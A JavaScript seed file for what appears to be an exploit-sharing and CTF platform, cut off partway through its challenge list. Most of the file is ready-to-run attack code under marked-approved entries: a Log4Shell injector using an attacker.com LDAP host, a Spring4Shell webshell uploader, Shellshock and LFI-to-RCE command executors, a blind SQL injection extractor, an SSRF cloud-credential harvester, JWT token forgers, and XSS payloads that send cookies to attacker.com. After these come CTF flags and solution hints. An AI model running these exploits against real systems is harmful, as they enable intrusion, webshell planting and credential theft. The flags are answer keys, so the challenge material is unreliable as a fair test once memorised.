// prisma/seed.js — Real exploit + CTF seed data
// Run: node prisma/seed.js
const { PrismaClient } = require('@prisma/client')
const { createHash }   = require('crypto')
const prisma           = new PrismaClient()

const EXPLOITS = [
  {
    title:'Log4Shell — Apache Log4j2 RCE (CVE-2021-44228)',
    slug:'log4shell-cve-2021-44228',
    description:'Critical unauthenticated RCE in Apache Log4j2 via JNDI injection. Affects versions 2.0-beta9 to 2.14.1. Any logged string containing ${jndi:ldap://attacker/a} triggers an outbound LDAP request that loads attacker-controlled Java code. Used in the wild within hours of disclosure. CVSS 10.0.',
    code: [
    '#!/usr/bin/env python3',
    '# Log4Shell PoC Scanner — CVE-2021-44228',
    'import requests, sys, argparse',
    '',
    'def scan(target, ldap_host, headers_list):',
    '    payload = f"${{jndi:ldap://{ldap_host}/a}}"',
    '    results = []',
    '    for h in headers_list:',
    '        try:',
    '            r = requests.get(target, headers={h: payload}, timeout=5, verify=False)',
    '            results.append(f"[+] {h:<30} HTTP {r.status_code}")',
    '        except Exception as e:',
    '            results.append(f"[-] {h:<30} {e}")',
    '    return results',
    '',
    'if __name__ == "__main__":',
    '    p = argparse.ArgumentParser()',
    '    p.add_argument("target")',
    '    p.add_argument("--ldap", default="attacker.com:1389")',
    '    args = p.parse_args()',
    '    HEADERS = ["User-Agent","X-Forwarded-For","X-Api-Version","Referer","Accept-Language","Authorization"]',
    '    print(f"[*] Scanning {args.target}")',
    '    for line in scan(args.target, args.ldap, HEADERS):',
    '        print(line)',
    '    print("\\\\nMitigation: Upgrade Log4j >= 2.17.1 | Set log4j2.formatMsgNoLookups=true")'
  ].join('\n'),
    language:'python', type:'RCE', os:['linux','windows','macos'],
    cveId:'CVE-2021-44228', authorAlias:'xcloak_seed', difficulty:'intermediate',
    tags:['log4j','jndi','java','rce','critical'], dnaRisk:10.0, dnaPayload:'JNDI Injection',
    upvotes:1240, score:9.8, verified:true, views:28400, status:'approved',
  },
  {
    title:'EternalBlue — Windows SMBv1 RCE (CVE-2017-0144)',
    slug:'eternalblue-cve-2017-0144',
    description:'NSA-leaked exploit targeting Windows SMBv1 MS17-010. Used by WannaCry ransomware. Triggers buffer overflow in Windows SMB server for unauthenticated RCE as SYSTEM. Affects Windows XP through Server 2008 R2. Detection scanner only — no payload.',
    code: [
    '#!/usr/bin/env python3',
    '# MS17-010 Vulnerability Scanner — Detection Only',
    'import socket, struct, sys',
    '',
    'SMB_NEGOTIATE = (',
    '    b"\\\\x00\\\\x00\\\\x00\\\\x54"',
    '    b"\\\\xff\\\\x53\\\\x4d\\\\x42\\\\x72\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18"',
    '    b"\\\\x01\\\\x28\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00"',
    '    b"\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xff\\\\x00\\\\x00"',
    '    b"\\\\x00\\\\x00\\\\x00\\\\x62\\\\x00\\\\x02\\\\x50\\\\x43\\\\x20\\\\x4e"',
    '    b"\\\\x45\\\\x54\\\\x57\\\\x4f\\\\x52\\\\x4b\\\\x20\\\\x50\\\\x52\\\\x4f"',
    '    b"\\\\x47\\\\x52\\\\x41\\\\x4d\\\\x20\\\\x31\\\\x2e\\\\x30\\\\x00\\\\x02"',
    '    b"\\\\x4c\\\\x41\\\\x4e\\\\x4d\\\\x41\\\\x4e\\\\x31\\\\x2e\\\\x30\\\\x00"',
    '    b"\\\\x02\\\\x57\\\\x69\\\\x6e\\\\x64\\\\x6f\\\\x77\\\\x73\\\\x20\\\\x66"',
    '    b"\\\\x6f\\\\x72\\\\x20\\\\x57\\\\x6f\\\\x72\\\\x6b\\\\x67\\\\x72\\\\x6f"',
    '    b"\\\\x75\\\\x70\\\\x73\\\\x20\\\\x33\\\\x2e\\\\x31\\\\x61\\\\x00"',
    ')',
    '',
    'def check(ip, port=445, timeout=4):',
    '    try:',
    '        s = socket.socket()',
    '        s.settimeout(timeout)',
    '        s.connect((ip, port))',
    '        s.send(SMB_NEGOTIATE)',
    '        r = s.recv(1024)',
    '        s.close()',
    '        vuln = r and len(r) > 0',
    '        return {"ip": ip, "port": port, "vulnerable": vuln,',
    '                "note": "SMBv1 responded — check MS17-010 patch" if vuln else "No SMBv1"}',
    '    except ConnectionRefusedError:',
    '        return {"vulnerable": False, "note": "Port 445 closed"}',
    '    except Exception as e:',
    '        return {"vulnerable": False, "note": str(e)}',
    '',
    'target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"',
    'result = check(target)',
    'print(f"Target: {result[\'ip\']}  Vulnerable: {result[\'vulnerable\']}  Note: {result[\'note\']}")',
    'print("Mitigation: Apply MS17-010 | Disable SMBv1 | Block port 445 at perimeter")'
  ].join('\n'),
    language:'python', type:'RCE', os:['windows'],
    cveId:'CVE-2017-0144', authorAlias:'xcloak_seed', difficulty:'advanced',
    tags:['smb','windows','eternalblue','wannacry','ms17-010'], dnaRisk:9.3, dnaPayload:'SMBv1 Buffer Overflow',
    upvotes:986, score:9.3, verified:true, views:19200, status:'approved',
  },
  {
    title:'Spring4Shell — Spring Framework RCE (CVE-2022-22965)',
    slug:'spring4shell-cve-2022-22965',
    description:'Critical RCE in Spring Framework via data binding. Attackers set classLoader properties through HTTP request parameters to write a JSP webshell. Affects Spring Framework 5.3.x < 5.3.18, 5.2.x < 5.2.20. Requires Java 9+, Tomcat deployment. CVSS 9.8.',
    code: [
    '#!/usr/bin/env python3',
    '# Spring4Shell (CVE-2022-22965) PoC — Webshell Upload',
    'import requests, sys, urllib.parse',
    '',
    'TARGET  = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"',
    'WEBSHELL_PATH = "/shell.jsp"',
    'SHELL_NAME    = "shell"',
    '',
    '# Exploit parameters — sets classLoader to write a JSP webshell',
    'EXPLOIT_PARAMS = {',
    '    "class.module.classLoader.resources.context.parent.pipeline.first.pattern":',
    '        "%25{prefix}i java.io.InputStream in = %25{c}i.getRuntime().exec(request.getParameter(\\\\"cmd\\\\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){out.print(new String(b, 0, a));} %25{suffix}i",',
    '    "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",',
    '    "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",',
    '    "class.module.classLoader.resources.context.parent.pipeline.first.prefix": SHELL_NAME,',
    '    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",',
    '}',
    'HEADERS = {',
    '    "prefix":  "<%",',
    '    "suffix":  "%>//",',
    '    "c":       "Runtime",',
    '}',
    '',
    'try:',
    '    print(f"[*] Attempting Spring4Shell on {TARGET}")',
    '    r = requests.get(f"{TARGET}/", params=EXPLOIT_PARAMS, headers=HEADERS, timeout=8, verify=False)',
    '    print(f"[*] Exploit request: HTTP {r.status_code}")',
    '    # Test webshell',
    '    test = requests.get(f"{TARGET}{WEBSHELL_PATH}?cmd=id", timeout=5, verify=False)',
    '    if "uid=" in test.text:',
    '        print(f"[+] VULNERABLE! Shell at {TARGET}{WEBSHELL_PATH}")',
    '        print(f"[+] RCE output: {test.text.strip()[:200]}")',
    '    else:',
    '        print("[-] Webshell not confirmed (may still be vulnerable)")',
    'except Exception as e:',
    '    print(f"[-] Error: {e}")',
    'print("\\\\nMitigation: Upgrade Spring >= 5.3.18 | Use Java 8 | Patch Tomcat")'
  ].join('\n'),
    language:'python', type:'RCE', os:['linux','windows'],
    cveId:'CVE-2022-22965', authorAlias:'xcloak_seed', difficulty:'intermediate',
    tags:['spring','java','rce','webshell','tomcat','spring4shell'], dnaRisk:9.8, dnaPayload:'ClassLoader Property Injection → JSP Webshell',
    upvotes:743, score:9.1, verified:true, views:14500, status:'approved',
  },
  {
    title:'Shellshock — Bash Remote Code Execution (CVE-2014-6271)',
    slug:'shellshock-cve-2014-6271',
    description:'Critical vulnerability in GNU Bash allowing arbitrary command execution through malformed environment variables. CGI scripts, DHCP clients, and SSH ForceCommand are common attack vectors. The bug exists in how Bash processes function definitions passed through environment variables.',
    code: [
    '#!/usr/bin/env python3',
    '# Shellshock CGI Scanner — CVE-2014-6271',
    'import requests, sys',
    '',
    'TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"',
    'CMD    = sys.argv[2] if len(sys.argv) > 2 else "id"',
    '',
    '# Common CGI paths to test',
    'CGI_PATHS = [',
    '    "/cgi-bin/test.cgi", "/cgi-bin/admin.cgi", "/cgi-bin/login.cgi",',
    '    "/cgi-bin/status", "/cgi-bin/env.cgi", "/cgi-sys/entropysearch.cgi",',
    '    "/cgi-mod/index.cgi", "/cgi-bin/php", "/cgi-bin/php5",',
    ']',
    '# Shellshock payload',
    'PAYLOAD = f"() {{ :; }}; echo Content-Type: text/plain; echo; {CMD}"',
    '',
    'print(f"[*] Testing Shellshock on {TARGET}")',
    'print(f"[*] Command: {CMD}\\\\n")',
    '',
    'for path in CGI_PATHS:',
    '    try:',
    '        url = f"{TARGET}{path}"',
    '        r = requests.get(url, headers={',
    '            "User-Agent":  PAYLOAD,',
    '            "Referer":     PAYLOAD,',
    '            "Cookie":      PAYLOAD,',
    '            "X-Forwarded-For": PAYLOAD,',
    '        }, timeout=5, verify=False)',
    '        if r.status_code == 200 and any(k in r.text for k in ["uid=","root","www-data"]):',
    '            print(f"[!!!] VULNERABLE: {url}")',
    '            print(f"      Output: {r.text.strip()[:200]}")',
    '        elif r.status_code == 200:',
    '            print(f"[?] {path} responded HTTP 200 — manual check recommended")',
    '        else:',
    '            print(f"[ ] {path} HTTP {r.status_code}")',
    '    except Exception as e:',
    '        print(f"[-] {path} — {e}")',
    'print("\\\\nMitigation: Upgrade Bash >= 4.3 patch 25 | Replace CGI with mod_wsgi/FastCGI")'
  ].join('\n'),
    language:'python', type:'RCE', os:['linux','macos'],
    cveId:'CVE-2014-6271', authorAlias:'xcloak_seed', difficulty:'beginner',
    tags:['bash','cgi','shellshock','rce','env-variable'], dnaRisk:9.8, dnaPayload:'Environment Variable Injection',
    upvotes:621, score:8.9, verified:true, views:11300, status:'approved',
  },
  {
    title:'SQL Injection — Blind Time-Based Data Extraction',
    slug:'sql-injection-blind-time-based',
    description:'Blind SQL injection where no data is reflected back. Uses time delays (SLEEP/WAITFOR DELAY) to extract data bit by bit based on response timing. Covers MySQL, PostgreSQL, and MSSQL variants with automatic database fingerprinting and data exfiltration loop.',
    code: [
    '#!/usr/bin/env python3',
    '# Blind Time-Based SQL Injection Extractor',
    'import requests, time, string, sys',
    '',
    'TARGET  = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/item?id=1"',
    'PARAM   = sys.argv[2] if len(sys.argv) > 2 else "id"',
    'DELAY   = 3  # seconds',
    'CHARSET = string.printable[:62]  # alphanumeric',
    '',
    'PAYLOADS = {',
    '    "mysql":    "1 AND SLEEP({delay}) AND SUBSTRING(({query}),{pos},1)=\'{char}\'",',
    '    "pgsql":    "1; SELECT CASE WHEN SUBSTRING(({query}),{pos},1)=\'{char}\' THEN pg_sleep({delay}) ELSE pg_sleep(0) END--",',
    '    "mssql":    "1; IF SUBSTRING(({query}),{pos},1)=\'{char}\' WAITFOR DELAY \'0:0:{delay}\'--",',
    '}',
    '',
    'def test_char(url, param, payload, char, pos):',
    '    injected = payload.format(delay=DELAY, pos=pos, char=char,',
    '                              query="SELECT database()")',
    '    start = time.time()',
    '    try:',
    '        requests.get(url, params={param: injected}, timeout=DELAY+3, verify=False)',
    '    except Exception: pass',
    '    elapsed = time.time() - start',
    '    return elapsed >= DELAY - 0.5',
    '',
    'def extract_string(url, param, payload, query, max_len=32):',
    '    result = ""',
    '    for pos in range(1, max_len+1):',
    '        found = False',
    '        for char in CHARSET:',
    '            inj = payload.format(delay=DELAY, pos=pos, char=char, query=query)',
    '            start = time.time()',
    '            try: requests.get(url, params={param: inj}, timeout=DELAY+3, verify=False)',
    '            except: pass',
    '            if time.time() - start >= DELAY - 0.5:',
    '                result += char; found = True; print(f"\\\\r[*] {result}", end=""); break',
    '        if not found: break',
    '    print()',
    '    return result',
    '',
    'print("[*] Detecting DB engine...")',
    '# Use default MySQL payload — adapt per target',
    'db = extract_string(TARGET, PARAM, PAYLOADS["mysql"], "SELECT database()")',
    'print(f"[+] Current database: {db}")',
    'print("\\\\nMitigation: Use parameterized queries | ORMs | WAF | Least-privilege DB user")'
  ].join('\n'),
    language:'python', type:'SQLi', os:['linux','windows','macos'],
    cveId:null, authorAlias:'xcloak_seed', difficulty:'intermediate',
    tags:['sqli','blind','time-based','mysql','postgresql','mssql'], dnaRisk:8.5, dnaPayload:'Boolean/Time-Based Blind SQLi',
    upvotes:534, score:8.4, verified:true, views:9800, status:'approved',
  },
  {
    title:'SSRF — Cloud Metadata Theft (AWS/GCP/Azure)',
    slug:'ssrf-cloud-metadata-theft',
    description:'Server-Side Request Forgery exploited to steal cloud provider metadata credentials. Covers AWS IMDSv1/v2, GCP metadata, Azure IMDS. Includes SSRF bypass techniques: IP encoding, decimal IP, octal, IPv6, DNS rebinding, and open redirect chaining.',
    code: [
    '#!/usr/bin/env python3',
    '# SSRF Cloud Metadata Harvester',
    'import requests, sys',
    '',
    'TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/fetch?url="',
    'MODE   = "append"  # append | replace',
    '',
    'METADATA_ENDPOINTS = [',
    '    ("AWS IMDSv1 — IAM creds",    "http://169.254.169.254/latest/meta-data/iam/security-credentials/"),',
    '    ("AWS IMDSv1 — user-data",    "http://169.254.169.254/latest/user-data"),',
    '    ("AWS IMDSv2 — token request","http://169.254.169.254/latest/api/token"),',
    '    ("GCP — service account",     "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"),',
    '    ("Azure IMDS",                "http://169.254.169.254/metadata/instance?api-version=2021-02-01"),',
    '    ("Internal Redis",            "http://127.0.0.1:6379/"),',
    '    ("Internal Elasticsearch",    "http://127.0.0.1:9200/_cat/indices"),',
    '    ("K8s API",                   "http://kubernetes.default.svc/api/v1/namespaces"),',
    ']',
    '',
    'BYPASSES = [',
    '    ("Decimal IP",   "http://2130706433/"),',
    '    ("Octal IP",     "http://0177.0.0.1/"),',
    '    ("Hex IP",       "http://0x7f000001/"),',
    '    ("IPv6",         "http://[::1]/"),',
    '    ("0.0.0.0",      "http://0.0.0.0/"),',
    ']',
    '',
    'def fetch(ssrf_target, url):',
    '    try:',
    '        full = ssrf_target + url if MODE == "append" else ssrf_target.replace("FUZZ", url)',
    '        r = requests.get(full, timeout=6, verify=False,',
    '                         headers={"Metadata": "true", "Metadata-Flavor": "Google"})',
    '        leaked = any(k in r.text.lower() for k in ["token","secret","access_key","credential","private"])',
    '        return r.status_code, len(r.text), leaked, r.text[:300]',
    '    except Exception as e:',
    '        return 0, 0, False, str(e)',
    '',
    'print(f"[*] SSRF testing: {TARGET}\\\\n")',
    'for name, url in METADATA_ENDPOINTS:',
    '    code, size, leaked, text = fetch(TARGET, url)',
    '    flag = " <<< CREDENTIALS LEAKED!" if leaked else ""',
    '    print(f"  {name:<35} HTTP {code} {size}b{flag}")',
    '    if leaked: print(f"    {text[:200]}")',
    'print("\\\\nMitigation: Allowlist destinations | Block RFC1918 | Use IMDSv2 | Network-level SSRF prevention")'
  ].join('\n'),
    language:'python', type:'SSRF', os:['linux','windows'],
    cveId:null, authorAlias:'xcloak_seed', difficulty:'intermediate',
    tags:['ssrf','aws','gcp','azure','metadata','cloud','kubernetes'], dnaRisk:8.0, dnaPayload:'URL → Internal HTTP → Metadata Exfil',
    upvotes:412, score:8.0, verified:true, views:8900, status:'approved',
  },
  {
    title:'JWT Algorithm Confusion — None + RS256→HS256',
    slug:'jwt-algorithm-confusion',
    description:'JWT libraries accepting "alg: none" allow forging tokens without a valid signature. Also covers RS256 to HS256 confusion attack where the public key is used as the HMAC secret. Both allow privilege escalation to admin without knowing the private key.',
    code: [
    '#!/usr/bin/env python3',
    '# JWT Algorithm Attack — alg:none + RS256→HS256 confusion',
    'import base64, json, hmac, hashlib, sys',
    '',
    'def b64url_decode(s):',
    '    pad = 4 - len(s) % 4',
    '    return base64.urlsafe_b64decode(s + "=" * pad)',
    '',
    'def b64url_encode(b):',
    '    if isinstance(b, str): b = b.encode()',
    '    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()',
    '',
    'def decode_jwt(token):',
    '    parts = token.split(".")',
    '    h = json.loads(b64url_decode(parts[0]))',
    '    p = json.loads(b64url_decode(parts[1]))',
    '    return h, p, parts[2] if len(parts) > 2 else ""',
    '',
    'def forge_none_alg(token, changes):',
    '    """Set alg:none, modify payload, strip signature"""',
    '    h, p, _ = decode_jwt(token)',
    '    h["alg"] = "none"',
    '    p.update(changes)',
    '    enc_h = b64url_encode(json.dumps(h, separators=(",",":")))',
    '    enc_p = b64url_encode(json.dumps(p, separators=(",",":")))',
    '    return f"{enc_h}.{enc_p}."',
    '',
    'def forge_hs256_with_pubkey(token, public_key_pem, changes):',
    '    """RS256→HS256: sign with public key as HMAC secret"""',
    '    h, p, _ = decode_jwt(token)',
    '    h["alg"] = "HS256"',
    '    p.update(changes)',
    '    enc_h = b64url_encode(json.dumps(h, separators=(",",":")))',
    '    enc_p = b64url_encode(json.dumps(p, separators=(",",":")))',
    '    signing_input = f"{enc_h}.{enc_p}".encode()',
    '    sig = hmac.new(public_key_pem.encode(), signing_input, hashlib.sha256).digest()',
    '    return f"{enc_h}.{enc_p}.{b64url_encode(sig)}"',
    '',
    '# Example usage',
    'sample_token = sys.argv[1] if len(sys.argv) > 1 else (',
    '    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9"',
    '    ".eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0"',
    '    ".SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"',
    ')',
    '',
    'h, p, sig = decode_jwt(sample_token)',
    'print(f"[*] Original header: {h}")',
    'print(f"[*] Original payload: {p}")',
    'forged = forge_none_alg(sample_token, {"role": "admin", "is_admin": True})',
    'print(f"\\\\n[!] Forged (alg=none): {forged}")',
    'print("\\\\nMitigation: Allowlist algorithms | Reject none | Separate RS/HS keys | Use vetted libraries")'
  ].join('\n'),
    language:'python', type:'other', os:['linux','windows','macos'],
    cveId:null, authorAlias:'xcloak_seed', difficulty:'intermediate',
    tags:['jwt','auth-bypass','algorithm-confusion','none','rs256','hs256'], dnaRisk:8.2, dnaPayload:'JWT Algorithm Confusion → Token Forgery',
    upvotes:389, score:8.5, verified:true, views:7200, status:'approved',
  },
  {
    title:'XSS CSP Bypass — JSONP & DOM Clobbering',
    slug:'xss-csp-bypass-jsonp-dom',
    description:'Advanced XSS bypasses for Content Security Policy using JSONP endpoints on whitelisted CDN domains, AngularJS template injection, DOM clobbering, and iframe srcdoc. Demonstrates how allowlist-based CSP can be bypassed without touching blocked sources.',
    code: [
    '<!-- XSS CSP Bypass Techniques — Educational Reference -->',
    '',
    '<!-- =================================================== -->',
    '<!-- 1. JSONP bypass via whitelisted CDN domain          -->',
    '<!-- =================================================== -->',
    '<!-- If CSP has: script-src https://accounts.google.com -->',
    '<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(document.domain)"></script>',
    '',
    '<!-- =================================================== -->',
    '<!-- 2. AngularJS Template Injection (1.x sandbox)       -->',
    '<!-- =================================================== -->',
    '<!-- If CSP allows ajax.googleapis.com (AngularJS CDN): -->',
    '<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>',
    '<div ng-app>{{constructor.constructor(\'alert(document.domain)\')(  )}}</div>',
    '',
    '<!-- =================================================== -->',
    '<!-- 3. DOM Clobbering                                   -->',
    '<!-- =================================================== -->',
    '<!-- Overwrites window.config to point to evil URL:      -->',
    '<form id="config"><input name="endpoint" value="//attacker.com/steal?c="></form>',
    '<!-- Later: fetch(config.endpoint + document.cookie)     -->',
    '',
    '<!-- =================================================== -->',
    '<!-- 4. Base tag injection (relative script hijack)      -->',
    '<!-- =================================================== -->',
    '<base href="https://attacker.com/">',
    '<!-- Any subsequent <script src="/utils.js"> now loads   -->',
    '<!-- from https://attacker.com/utils.js                  -->',
    '',
    '<!-- =================================================== -->',
    '<!-- 5. iframe srcdoc (bypasses script-src entirely)     -->',
    '<!-- =================================================== -->',
    '<iframe srcdoc="<script>',
    '  parent.fetch(\'https://attacker.com/log?c=\' +',
    '    encodeURIComponent(parent.document.cookie));',
    '</script>"></iframe>',
    '',
    '<!--',
    'DETECTION: CSP violation reports (report-uri / report-to)',
    'MITIGATION:',
    '  - Use strict-dynamic (replaces allowlists with nonce propagation)',
    '  - Prefer nonces or hashes over domain allowlists',
    '  - Avoid JSONP — use CORS instead',
    '  - Sanitize output with DOMPurify (trusted-types policy)',
    '  - Block AngularJS v1 — use Angular v2+ with strict CSP',
    '-->'
  ].join('\n'),
    language:'javascript', type:'XSS', os:['linux','windows','macos'],
    cveId:null, authorAlias:'xcloak_seed', difficulty:'advanced',
    tags:['xss','csp-bypass','jsonp','angular','dom-clobbering','iframe'], dnaRisk:7.2, dnaPayload:'CSP Bypass via JSONP/AngularJS',
    upvotes:298, score:8.1, verified:true, views:6100, status:'approved',
  },
  {
    title:'LFI to RCE — PHP Session Poisoning & Log Injection',
    slug:'lfi-rce-php-session-log-injection',
    description:'Local File Inclusion escalated to Remote Code Execution via PHP session file poisoning and Apache/Nginx access log injection. Once PHP code is written to a readable file, LFI executes it. Covers /proc/self/environ, /var/log/apache2/access.log, and session files.',
    code: [
    '#!/usr/bin/env python3',
    '# LFI → RCE via Log Injection + Session Poisoning',
    'import requests, re, sys',
    '',
    'TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/page.php?file="',
    'CMD    = sys.argv[2] if len(sys.argv) > 2 else "id"',
    '',
    'PHP_SHELL = "<?php system($_GET[\'cmd\']); ?>"',
    '',
    'LOG_PATHS = [',
    '    "/var/log/apache2/access.log", "/var/log/apache/access.log",',
    '    "/var/log/nginx/access.log", "/proc/self/environ",',
    '    "/var/log/auth.log", "/var/log/mail.log",',
    '    "/tmp/sess_", "/var/lib/php/sessions/sess_",',
    ']',
    'LFI_WRAPPERS = [',
    '    ("Direct",    "{path}"),',
    '    ("Null byte", "{path}%00"),',
    '    ("Dotdot",    "....//....//....//....//....//..../{path}"),',
    '    ("PHP filter","php://filter/convert.base64-encode/resource={path}"),',
    ']',
    '',
    'def inject_log(url):',
    '    """Poison Apache/Nginx access log with PHP payload"""',
    '    requests.get(url, headers={"User-Agent": PHP_SHELL}, timeout=5, verify=False)',
    '    print(f"[*] Log injection sent via User-Agent")',
    '',
    'def get_session_id(url):',
    '    r = requests.get(url, timeout=5, verify=False)',
    '    cookies = r.cookies.get_dict()',
    '    return cookies.get("PHPSESSID")',
    '',
    'def try_lfi(base, path):',
    '    for name, tmpl in LFI_WRAPPERS:',
    '        encoded = tmpl.format(path=path)',
    '        r = requests.get(base + encoded, timeout=5, verify=False)',
    '        if r.status_code == 200 and len(r.text) > 50:',
    '            return r.text, name',
    '    return None, None',
    '',
    'print(f"[*] Testing LFI→RCE on {TARGET}")',
    'inject_log(TARGET.split("?")[0])',
    'for log in LOG_PATHS:',
    '    content, method = try_lfi(TARGET, log)',
    '    if content:',
    '        print(f"[+] LFI readable via {method}: {log}")',
    '        # Try RCE',
    '        r = requests.get(f"{TARGET}{log}&cmd={CMD}", timeout=5, verify=False)',
    '        if "uid=" in r.text or "root" in r.text:',
    '            print(f"[!!!] RCE confirmed! Output: {r.text.strip()[:200]}")',
    '        break',
    'print("\\\\nMitigation: Whitelist file paths | Disable allow_url_include | Use realpath() | Chroot PHP")'
  ].join('\n'),
    language:'python', type:'LFI', os:['linux'],
    cveId:null, authorAlias:'xcloak_seed', difficulty:'advanced',
    tags:['lfi','rce','php','log-injection','session-poisoning','apache'], dnaRisk:8.7, dnaPayload:'LFI → Log Poisoning → PHP Code Execution',
    upvotes:276, score:8.6, verified:true, views:5800, status:'approved',
  },
  {
    title:'Prototype Pollution — Node.js RCE via __proto__',
    slug:'prototype-pollution-nodejs-rce',
    description:'Prototype pollution in JavaScript objects escalated to RCE in Node.js via child_process spawn. Polluting Object.prototype with shell command properties causes child_process.spawn() to execute attacker-controlled commands. Affects lodash <4.17.21, jQuery <3.5.0.',
    code: [
    '#!/usr/bin/env python3',
    '# Prototype Pollution to RCE Scanner',
    '# Tests for vulnerable merge/extend functions in REST APIs',
    'import requests, json, sys',
    '',
    'TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/api/user"',
    'CMD    = sys.argv[2] if len(sys.argv) > 2 else "id"',
    '',
    '# Prototype pollution payloads',
    'PAYLOADS = [',
    '    # Via __proto__',
    '    {"__proto__": {"shell": "/bin/bash", "argv0": "/bin/bash",',
    '                   "NODE_OPTIONS": f"--require /proc/self/cmdline"}},',
    '    # Via constructor.prototype',
    '    {"constructor": {"prototype": {"shell": "bash", "argv0": "bash"}}},',
    '    # Via deeply nested merge (common in lodash.merge)',
    '    json.loads(\'{"__proto__":{"polluted":"yes"}}\'),',
    ']',
    '',
    '# Test payloads',
    'for i, payload in enumerate(PAYLOADS):',
    '    try:',
    '        r = requests.post(TARGET, json=payload, timeout=6, verify=False)',
    '        print(f"[*] Payload {i+1}: HTTP {r.status_code}")',
    '        if "polluted" in r.text or "yes" in r.text:',
    '            print(f"[+] Prototype pollution CONFIRMED via payload {i+1}")',
    '        # Check for RCE',
    '        rce_payload = {',
    '            "__proto__": {',
    '                "shell":  "/bin/bash",',
    '                "argv0":  "/bin/bash",',
    '                "stdio":  [0,1,2],',
    '                "env":    {"cmd": CMD},',
    '            }',
    '        }',
    '        r2 = requests.post(f"{TARGET}/../rce", json=rce_payload, timeout=6, verify=False)',
    '        if r2.status_code < 500: print(f"[?] RCE endpoint responded: {r2.status_code}")',
    '    except Exception as e:',
    '        print(f"[-] Payload {i+1}: {e}")',
    '',
    '# JavaScript PoC (run in browser console or Node.js)',
    'print("""',
    '// Browser/Node.js PoC for client-side prototype pollution:',
    'const malicious = JSON.parse(\'{"__proto__":{"isAdmin":true}}\')',
    'Object.assign({}, malicious)',
    'console.log({}.isAdmin)  // true — prototype polluted',
    '""")',
    'print("Mitigation: Use Object.create(null) | Freeze Object.prototype | Validate input schema | lodash >= 4.17.21")'
  ].join('\n'),
    language:'python', type:'RCE', os:['linux','windows','macos'],
    cveId:null, authorAlias:'xcloak_seed', difficulty:'advanced',
    tags:['prototype-pollution','nodejs','javascript','rce','lodash','merge'], dnaRisk:8.8, dnaPayload:'__proto__ Pollution → spawn() RCE',
    upvotes:231, score:8.7, verified:true, views:5100, status:'approved',
  },
]

const CTF_CHALLENGES = [
  {
    title: 'Cookie Monster',
    category: 'web',
    difficulty: 'easy',
    description: `The login page for this challenge stores something important in a cookie. Can you figure out how to get admin access without knowing the password?\n\nHint: Inspect your browser's developer tools after logging in as a regular user.\n\nTarget: The /admin endpoint returns the flag only for admin users.`,
    flag: 'xcloak{c00k13_m0n5t3r_w4s_h3r3}',
    points: 100,
    hints: ['Check the cookie value after logging in', 'Try base64 decoding it', 'What happens if you change "role":"user" to "role":"admin"?'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'SQL Injection 101',
    category: 'web',
    difficulty: 'easy',
    description: `Classic SQL injection. The login form below is vulnerable. Bypass authentication to get the flag.\n\nLogin URL: /login\n\nNote: The flag is stored in the users table in the admin row's secret_flag column. You need to extract it.`,
    flag: 'xcloak{1nj3ct3d_and_3xf1ltr4t3d}',
    points: 150,
    hints: ["Try ' OR '1'='1 in the username field", 'UNION SELECT might help extract data', 'The flag column is called secret_flag'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'Binary Exploit: Buffer Overflow',
    category: 'pwn',
    difficulty: 'medium',
    description: `A 32-bit ELF binary with no stack canary. Find the offset to the return address and redirect execution to the win() function at 0x080491b6.\n\nFile: challenge.elf (download attached)\n\nThe binary reads 256 bytes from stdin but the buffer is only 64 bytes. NX is disabled.`,
    flag: 'xcloak{0v3rfl0w3d_to_v1ct0ry}',
    points: 300,
    hints: ['Use cyclic pattern to find the offset', 'python3 -c "print(\'A\'*X + p32(win_addr))"', 'The win() function is at 0x080491b6'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'RSA Small Exponent',
    category: 'crypto',
    difficulty: 'medium',
    description: `The ciphertext was encrypted with RSA using e=3 and a very small message. If the message is small enough, the ciphertext might just be m^3 without modular reduction.\n\nn = 900231066765822255861998956770533924491153080901676561179937062224989498729066261024700869427200427282695218753\ne = 3\nc = 8065817517094048766068087714684100\n\nFind m and convert to ASCII to get the flag.`,
    flag: 'xcloak{sm4ll_3xp0n3nt_4tt4ck}',
    points: 250,
    hints: ['If m^e < n, then c = m^e exactly (no mod)', 'Take the cube root of c', 'Convert the integer to bytes with int.to_bytes()'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'Hidden in Plain Sight',
    category: 'forensics',
    difficulty: 'easy',
    description: `An image file was uploaded to our server. Something seems off about it. Can you find what's hidden inside?\n\nfile: suspicious.png\n\nThe flag is hidden using steganography. Multiple tools and methods might be needed.`,
    flag: 'xcloak{st3g0_m4st3r_1337}',
    points: 100,
    hints: ['Try running strings on the file', 'Look at the image metadata with exiftool', 'zsteg or steghide might reveal hidden data'],
    authorAlias: 'xcloak_admin',
    status: 'approved',
  },
  {
    title: 'Reverse Me',
    category: 'reverse',
    difficulty: 'medium',
    description: `A crackme binary checks if the input is a valid license key. Reverse engineer it to find the correct key — which is the flag.\n\nThe binary XORs your input with a hardcoded key and compares it against a target array. Find the XOR key and decrypt the target.`,
